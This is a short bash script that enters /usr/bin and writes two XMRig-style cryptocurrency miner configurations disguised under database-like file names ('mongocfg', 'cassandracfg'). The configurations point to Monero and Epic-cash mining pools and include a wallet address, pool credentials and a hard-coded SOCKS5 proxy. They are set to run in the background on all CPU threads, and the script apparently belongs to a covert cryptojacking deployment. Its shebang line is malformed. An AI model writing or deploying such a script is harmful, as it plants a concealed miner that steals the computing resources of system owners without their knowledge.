#/bin/bash
cd /usr/bin

echo '{
    "autosave": false,
    "background": true,
    "colors": false,
    "randomx": {
        "init": -1
    },
    "cpu": {
        "enabled": true,
        "rx": [-1, -1, -1, -1, -1, -1, -1, -1]
    },
    "donate-level": 1,
    "donate-over-proxy": 1,
    "pools": [
        {
            "enabled": true,
            "algo": "rx/0",
            "url": "xmr.f2pool.com:13531",
            "user": "85tMXhsu2FwWY51J5dDFx1XVQaZc62PP69se4kiRDEyB5m9FSVyemcj2DRdEWy3yZY8irDt3NqWt7gxKcpKYxoMP3vRKLM6",
            "pass": "x",
            "rig-id": "orange",
            "socks5": "52.229.58.220:41865"
        }
    ],
    "print-time": 3600,
    "retries": 4320,
    "retry-pause": 20
}' > mongocfg


echo '{
    "autosave": false,
    "background": true,
    "colors": false,
    "randomx/epic": {
        "init": -1
    },
    "cpu": {
        "enabled": true,
        "rx": [-1, -1, -1, -1, -1, -1, -1, -1]
    },
    "donate-level": 1,
    "donate-over-proxy": 1,
    "pools": [
        {
            "enabled": true,
            "algo": "randomx/epic",
            "url": "51pool.online:4416",
            "user": "huramintado;relax",
            "pass": "em6qyf29rjtc",
            "socks5": "52.229.58.220:41865"
        }
    ],
    "print-time": 3600,
    "user-agent": "xmrig/v-epic-0.0.1",
    "retries": 4320,
    "retry-pause": 20
}' > cassandracfg

